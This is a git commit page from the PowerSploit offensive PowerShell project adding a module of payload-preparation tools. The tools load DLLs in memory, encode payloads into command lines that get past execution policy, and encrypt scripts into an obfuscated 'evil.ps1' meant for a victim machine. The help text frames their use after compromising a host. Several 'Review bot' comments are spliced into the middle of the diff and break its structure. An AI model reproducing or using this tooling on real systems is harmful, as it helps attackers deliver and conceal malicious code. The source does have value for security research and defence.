author | bitform <matt@exploit-monday.com> | 2013-01-20 10:11:30 -0500 |
---|---|---|
committer | bitform <matt@exploit-monday.com> | 2013-01-20 10:11:30 -0500 |
commit | c45f3361e28d62a58a168de7848a8ba94e76cc33 (patch) | |
tree | cd7a9c0c984ee828878153c17b0f96fc93dedf98 /ScriptModification | |
parent | e9b22e9ae2391d1dc362501c282248945b3ca467 (diff) | |
download | PowerSploit-c45f3361e28d62a58a168de7848a8ba94e76cc33.tar.gz PowerSploit-c45f3361e28d62a58a168de7848a8ba94e76cc33.zip |
Created a ScriptModification module.
* All scripts used to prepare and/or modify payload scripts were added
to the ScriptModification module.
* Added Remove-Comments - Strips comments and extra whitespace from a
script.
* Encrypt-Script was renamed to Out-EncryptedScript in order to conform to
proper PowerShell verbs.
Diffstat (limited to 'ScriptModification')
-rw-r--r-- | ScriptModification/Out-CompressedDll.ps1 | 81 | ||||
-rw-r--r-- | ScriptModification/Out-EncodedCommand.ps1 | 184 | ||||
-rw-r--r-- | ScriptModification/Out-EncryptedScript.ps1 | 129 | ||||
-rw-r--r-- | ScriptModification/Remove-Comments.ps1 | 156 | ||||
-rw-r--r-- | ScriptModification/ScriptModification.psd1 | 88 | ||||
-rw-r--r-- | ScriptModification/ScriptModification.psm1 | 1 | ||||
-rw-r--r-- | ScriptModification/Usage.txt | 12 |
7 files changed, 651 insertions, 0 deletions
diff --git a/ScriptModification/Out-CompressedDll.ps1 b/ScriptModification/Out-CompressedDll.ps1
new file mode 100644
index 0000000..f781c15
--- /dev/null
+++ b/ScriptModification/Out-CompressedDll.ps1
@@ -0,0 +1,81 @@
+function Out-CompressedDll
+{
+<#
+.SYNOPSIS
+
+Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
+
+PowerSploit Module - Out-CompressedDll
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
+
+.PARAMETER FilePath
+
+Specifies the path to a managed executable.
+
+.EXAMPLE
+
+C:\PS> Out-CompressedDll -FilePath evil.dll
+
+Description
+-----------
+Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
+
+.NOTES
+
+Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.
+
+.LINK
+
+http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
+#>
+
+ [CmdletBinding()] Param (
+ [Parameter(Mandatory = $True)]
+ [String]
+ $FilePath
+ )
+
+ $Path = Resolve-Path $FilePath
+
+ if (! [IO.File]::Exists($Path))
+ {
+ Throw "$Path does not exist."
+ }
+
+ $FileBytes = [System.IO.File]::ReadAllBytes($Path)
+
+ if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')
+ {
+ Throw "$Path is not a valid executable."
+ }
+
+ $Length = $FileBytes.Length
+ $CompressedStream = New-Object IO.MemoryStream
+ $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
+ $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
+ $DeflateStream.Dispose()
+ $CompressedFileBytes = $CompressedStream.ToArray()
+ $CompressedStream.Dispose()
+ $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)
+
+ Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"
+
+ $Output = @"
+`$EncodedCompressedFile = @'
+$EncodedCompressedFile
+'@
+`$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
+`$UncompressedFileBytes = New-Object Byte[]($Length)
+`$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null
+[Reflection.Assembly]::Load(`$UncompressedFileBytes)
+"@
+
+ Write-Output $Output
+}
\ No newline at end of file
diff --git a/ScriptModification/Out-EncodedCommand.ps1 b/ScriptModification/Out-EncodedCommand.ps1
new file mode 100644
index 0000000..99d3f66
--- /dev/null
+++ b/ScriptModification/Out-EncodedCommand.ps1
@@ -0,0 +1,184 @@
+function Out-EncodedCommand
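Review bot: In Out-CompressedDll, `Resolve-Path $FilePath` runs before the `[IO.File]::Exists($Path)` test, so for a missing file the caller sees Resolve-Path's own error first and, if execution continues, a second message built from an empty `$Path`. Adding `-ErrorAction Stop` to the Resolve-Path call, or testing `$FilePath` before resolving it, would leave one clear error. The `MZ` comparison only confirms a PE header, while .NOTES says only pure MSIL DLLs load, so the help should state that the managed-image requirement is not checked here. The Write-Verbose line divides the Base-64 string length by the raw byte count, so the figure labelled `Compression ratio` includes the encoding overhead, which the message should say.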
+{
+<#
+.SYNOPSIS
+
+Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
+
+PowerSploit Module - Out-EncodedCommand
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
+
+.PARAMETER ScriptBlock
+
+Specifies a scriptblock containing your payload.
+
+.PARAMETER Path
+
+Specifies the path to your payload.
+
+.PARAMETER NoExit
+
+Outputs the option to not exit after running startup commands.
+
+.PARAMETER NoProfile
+
+Outputs the option to not load the Windows PowerShell profile.
+
+.PARAMETER NonInteractive
+
+Outputs the option to not present an interactive prompt to the user.
+
+.PARAMETER Wow64
+
+Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.
+
+.PARAMETER WindowStyle
+
+Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
+
+.PARAMETER EncodedOutput
+
+Base-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.
+
+.EXAMPLE
+
+C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
+
+powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
+
+.EXAMPLE
+
+C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput
+
+powershell -NoP -NonI -W Hidden -E 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
+
+Description
+-----------
+Execute the above payload for the lulz. >D
+
+.NOTES
+
+This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
+
+.LINK
+
+http://www.exploit-monday.com
+#>
+
+ [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
+ [ValidateNotNullOrEmpty()]
+ [ScriptBlock]
+ $ScriptBlock,
+
+ [Parameter(Position = 0, ParameterSetName = 'FilePath' )]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Path,
+
+ [Switch]
+ $NoExit,
+
+ [Switch]
+ $NoProfile,
+
+ [Switch]
+ $NonInteractive,
+
+ [Switch]
+ $Wow64,
+
+ [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
+ [String]
+ $WindowStyle,
+
+ [Switch]
+ $EncodedOutput
+ )
+
+ if ($PSBoundParameters['Path'])
+ {
+ Get-ChildItem $Path -ErrorAction Stop | Out-Null
+ $ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))
+ }
+ else
+ {
+ $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
+ }
+
+ $CompressedStream = New-Object IO.MemoryStream
+ $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
+ $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
+ $DeflateStream.Dispose()
+ $CompressedScriptBytes = $CompressedStream.ToArray()
+ $CompressedStream.Dispose()
+ $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
+
+ # Generate the code that will decompress and execute the payload.
+ # This code is intentionally ugly to save space.
+ $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
+
+ # Base-64 strings passed to -EncodedCommand must be unicode encoded.
+ $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
+ $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
+
+ # Build the command line options
+ # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
+ $CommandlineOptions = New-Object String[](0)
+ if ($PSBoundParameters['NoExit'])
+ { $CommandlineOptions += '-NoE' }
+ if ($PSBoundParameters['NoProfile'])
+ { $CommandlineOptions += '-NoP' }
+ if ($PSBoundParameters['NonInteractive'])
+ { $CommandlineOptions += '-NonI' }
+ if ($PSBoundParameters['WindowStyle'])
+ { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }
+
+ $CmdMaxLength = 8190
+
+ # Build up the full command-line string. Default to outputting a fully base-64 encoded command.
+ # If the fully base-64 encoded output exceeds the cmd.exe character limit, fall back to partial
+ # base-64 encoding to save space. Thanks @Carlos_Perez for the idea.
+ if ($PSBoundParameters['Wow64'])
+ {
+ $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
+
+ if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
+ {
+ $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
+ }
+
+ if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
+ {
+ $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
+ }
+ }
+ else
+ {
+ $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
+
+ if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
+ {
+ $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
+ }
+
+ if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
+ {
+ $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
+ }
+ }
+
+ if ($CommandLineOutput.Length -gt $CmdMaxLength)
+ {
+ Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'
+ }
+
+ Write-Output $CommandLineOutput
+}
\ No newline at end of file
diff --git a/ScriptModification/Out-EncryptedScript.ps1 b/ScriptModification/Out-EncryptedScript.ps1
new file mode 100644
index 0000000..1376673
--- /dev/null
+++ b/ScriptModification/Out-EncryptedScript.ps1
@@ -0,0 +1,129 @@
+function Out-EncryptedScript {
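Review bot: In Out-EncodedCommand, neither `$ScriptBlock` nor `$Path` is marked `Mandatory`, so a call with no arguments selects the default `FilePath` set, skips the `if ($PSBoundParameters['Path'])` branch and goes on to encode an unset `$ScriptBlock` instead of asking for input; Remove-Comments in this same commit declares both as `Mandatory = $True`, and this Param block should match. The `ASCII` encoder used in the `else` branch and again in the generated `$NewScript` replaces non-ASCII characters without warning, which deserves a line in .NOTES. The Wow64 and non-Wow64 branches repeat the same three-step length logic and differ only in the executable path, so the path could be chosen once and the logic written once. The .DESCRIPTION sentence about bypassing execution policies would be more accurate with a qualifier: execution policy is a safety setting rather than a security boundary, and both output forms (`-C` carrying the literal `FromBase64String`/`DeflateStream`/`iex` text, or `-E` carrying a Base-64 argument) remain visible to process command-line logging.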
+
+<#
+.SYNOPSIS
+
+Encrypts text files/scripts.
+
+PowerSploit Module - Out-EncryptedScript
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Out-EncryptedScript will encrypt a script (or any text file for that matter) and output the results to a minimally obfuscated script - evil.ps1.
+
+.PARAMETER ScriptPath
+
+Path to this script
+
+.PARAMETER Password
+
+Password to encrypt/decrypt the script
+
+.PARAMETER Salt
+
+Salt value for encryption/decryption. This can be any string value.
+
+.EXAMPLE
+
+C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty
+
+Description
+-----------
+Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext.
+
+.EXAMPLE
+
+C:\PS> [String] $cmd = Get-Content .\evil.ps1
+C:\PS> Invoke-Expression $cmd
+C:\PS> $decrypted = de password salt
+C:\PS> Invoke-Expression $decrypted
+
+Description
+-----------
+This series of instructions assumes you've already encrypted a script and named it evil.ps1. The contents are then decrypted and the unencrypted script is called via Invoke-Expression
+
+.NOTES
+
+This command can be used to encrypt any text-based file/script
+
+.LINK
+
+http://www.exploit-monday.com
+#>
+
+[CmdletBinding()] Param (
+ [Parameter(Position = 0, Mandatory = $True)]
+ [String]
+ $ScriptPath,
+
+ [Parameter(Position = 1, Mandatory = $True)]
+ [String]
+ $Password,
+
+ [Parameter(Position = 2, Mandatory = $True)]
+ [String]
+ $Salt,
+
+ [Parameter(Position = 3)]
+ [String]
+ $InitializationVector = ( @( foreach ($i in 1..16) { [Char](Get-Random -Min 0x41 -Max 0x5B) } ) -join '' ), # Generate random 16 character IV
+
+ [Parameter(Position = 4)]
+ [String]
+ $FilePath = '.\evil.ps1'
+)
+
+$AsciiEncoder = New-Object System.Text.ASCIIEncoding
+$ivBytes = $AsciiEncoder.GetBytes("CRACKMEIFYOUCAN!")
+# While this can be used to encrypt any file, it's primarily designed to encrypt itself.
+[Byte[]] $scriptBytes = Get-Content -Encoding byte -Path $ScriptPath
+$DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)
+$Key = New-Object System.Security.Cryptography.RijndaelManaged
+$Key.Mode = [System.Security.Cryptography.CipherMode]::CBC
+[Byte[]] $KeyBytes = $DerivedPass.GetBytes(32)
+$Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)
+$MemStream = New-Object System.IO.MemoryStream
+$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
+$CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
+$CryptoStream.FlushFinalBlock()
+$CipherTextBytes = $MemStream.ToArray()
+$MemStream.Close()
+$CryptoStream.Close()
+$Key.Clear()
+$Cipher = [Convert]::ToBase64String($CipherTextBytes)
+
+# Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function
+$Output = 'function de([String] $b, [String] $c)
+{
+$a = "'
+$Output += $cipher
+$Output += '"'
+$Output += ';
+$encoding = New-Object System.Text.ASCIIEncoding;
+$dd = $encoding.GetBytes("CRACKMEIFYOUCAN!");
+$aa = [Convert]::FromBase64String($a);
+$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2);
+[Byte[]] $e = $derivedPass.GetBytes(32);
+$f = New-Object System.Security.Cryptography.RijndaelManaged;
+$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
+[Byte[]] $h = New-Object Byte[]($aa.Length);
+$g = $f.CreateDecryptor($e, $dd);
+$i = New-Object System.IO.MemoryStream($aa, $True);
+$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
+$r = $j.Read($h, 0, $h.Length);
+$i.Close();
+$j.Close();
+$f.Clear();
+return $encoding.GetString($h,0,$h.Length);
+}'
+
+# Output decrypt function and ciphertext to evil.ps1
+Out-File -InputObject $Output -Encoding ASCII $FilePath
+
+Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
+
+}
\ No newline at end of file
diff --git a/ScriptModification/Remove-Comments.ps1 b/ScriptModification/Remove-Comments.ps1
new file mode 100644
index 0000000..64c3e31
--- /dev/null
+++ b/ScriptModification/Remove-Comments.ps1
@@ -0,0 +1,156 @@
+function Remove-Comments
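Review bot: In Out-EncryptedScript, the `$InitializationVector` parameter and its random default are never read: `$ivBytes` is built from the literal `CRACKMEIFYOUCAN!`, and the same literal is written into the generated `de` function. Either drop the parameter or put a comment on the `$ivBytes` line such as `# NOTE: -InitializationVector is currently ignored; the IV is this fixed string and is stored in clear text in the output file`. The comment-based help has no `.PARAMETER` entry for `InitializationVector` or `FilePath`, and `.PARAMETER ScriptPath` reads `Path to this script` although the parameter is the file to encrypt. The first example's statement that analysis is impossible without the password and salt overstates what the code does: the key comes from `PasswordDeriveBytes` with SHA1 and 2 iterations, and every output file carries the same constant IV and the same function text, which gives an analyst a stable string to match on.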
+{
+<#
+.SYNOPSIS
+
+Strips comments and extra whitespace from a script.
+
+PowerSploit Module - Remove-Comments
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
+
+A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!
+
+.PARAMETER ScriptBlock
+
+Specifies a scriptblock containing your script.
+
+.PARAMETER Path
+
+Specifies the path to your script.
+
+.EXAMPLE
+
+C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1
+
+.EXAMPLE
+
+C:\PS> Remove-Comments -ScriptBlock {
+### This is my awesome script. My documentation is beyond reproach!
+ Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
+### End script awesomeness
+}
+
+Write-Host 'Hello, World!'
+
+.EXAMPLE
+
+C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand
+
+Description
+-----------
+Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
+
+.INPUTS
+
+System.String, System.Management.Automation.ScriptBlock
+
+Accepts either a string containing the path to a script or a scriptblock.
+
+.OUTPUTS
+
+System.Management.Automation.ScriptBlock
+
+Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
+
+.LINK
+
+http://www.exploit-monday.com
+http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/
+#>
+
+ [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param (
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Path,
+
+ [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )]
+ [ValidateNotNullOrEmpty()]
+ [ScriptBlock]
+ $ScriptBlock
+ )
+
+ Set-StrictMode -Version 2
+
+ if ($PSBoundParameters['Path'])
+ {
+ Get-ChildItem $Path -ErrorAction Stop | Out-Null
+ $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path))
+ $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString)
+ }
+ else
+ {
+ # Convert the scriptblock to a string so that it can be referenced with array notation
+ $ScriptBlockString = $ScriptBlock.ToString()
+ }
+
+ # Tokenize the scriptblock and return all tokens except for comments
+ $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' }
+
+ $StringBuilder = New-Object Text.StringBuilder
+
+ # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script.
+ $CurrentColumn = 1
+ $NewlineCount = 0
+ foreach($CurrentToken in $Tokens)
+ {
+ # Now output the token
+ if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation'))
+ {
+ $CurrentColumn = 1
+ # Only insert a single newline. Sequential newlines are ignored in order to save space.
+ if ($NewlineCount -eq 0)
+ {
+ $StringBuilder.AppendLine() | Out-Null
+ }
+ $NewlineCount++
+ }
+ else
+ {
+ $NewlineCount = 0
+
+ # Do any indenting
+ if($CurrentColumn -lt $CurrentToken.StartColumn)
+ {
+ # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored.
+ if ($CurrentColumn -ne 1)
+ {
+ $StringBuilder.Append(' ') | Out-Null
+ }
+ }
+
+ # See where the token ends
+ $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1
+
+ # Handle the line numbering for multi-line strings
+ if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine))
+ {
+ $LineCounter = $CurrentToken.StartLine
+ $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n')
+
+ foreach($StringLine in $StringLines)
+ {
+ $StringBuilder.Append($StringLine) | Out-Null
+ $LineCounter++
+ }
+ }
+ # Write out a regular token
+ else
+ {
+ $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null
+ }
+
+ # Update our position in the column
+ $CurrentColumn = $CurrentToken.EndColumn
+ }
+ }
+
+ Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
+}
\ No newline at end of file
diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1
new file mode 100644
index 0000000..df07db5
--- /dev/null
+++ b/ScriptModification/ScriptModification.psd1
@@ -0,0 +1,88 @@
+@{
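Review bot: In Remove-Comments, the pattern given to `-split` on the `$StringLines` line is written in single quotes, so its backtick escapes are not expanded and the split never matches a real line break; the multi-line string branch therefore appends the token unchanged, and `$LineCounter` is incremented but never read. That branch can be reduced to the same `$StringBuilder.Append(...)` call as the `else`, with a comment that multi-line strings are copied verbatim. The first `if` treats `LineContinuation` like `NewLine`, which appears to turn a backtick-continued statement into two separate lines; appending a single space for that token type would keep the statement intact. `Tokenize($ScriptBlock, [Ref] $Null)` also discards the tokenizer's error list, so input that does not parse is processed silently; passing `[Ref] $ParseErrors` and throwing when it is non-empty would surface that.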
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'ScriptModification.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Script Preparation/Modification Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'})
+
+# List of all files packaged with this module
+FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
+ 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.txt'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
\ No newline at end of file
diff --git a/ScriptModification/ScriptModification.psm1 b/ScriptModification/ScriptModification.psm1
new file mode 100644
index 0000000..5bb81d3
--- /dev/null
+++ b/ScriptModification/ScriptModification.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file
diff --git a/ScriptModification/Usage.txt b/ScriptModification/Usage.txt
new file mode 100644
index 0000000..ddff666
--- /dev/null
+++ b/ScriptModification/Usage.txt
@@ -0,0 +1,12 @@
+To install this module, drop the entire PETools folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
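Review bot: The one-line loader in ScriptModification.psm1 dot-sources every `*.ps1` that happens to be in `$PSScriptRoot`, so any extra script placed in the module folder runs in the importer's session on `Import-Module`; the `FileList` in ScriptModification.psd1 is not consulted. Listing the function files explicitly, e.g. `'Out-CompressedDll','Out-EncodedCommand','Out-EncryptedScript','Remove-Comments' | % { . (Join-Path $PSScriptRoot "$_.ps1") }`, keeps the import limited to the files the manifest names. Separately, Usage.txt in the following file section tells the reader to drop the `PETools` folder, which looks carried over from another module's instructions and should name `ScriptModification`.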
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module ScriptModification`
+
+To see the commands imported, type `Get-Command -Module ScriptModification`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file |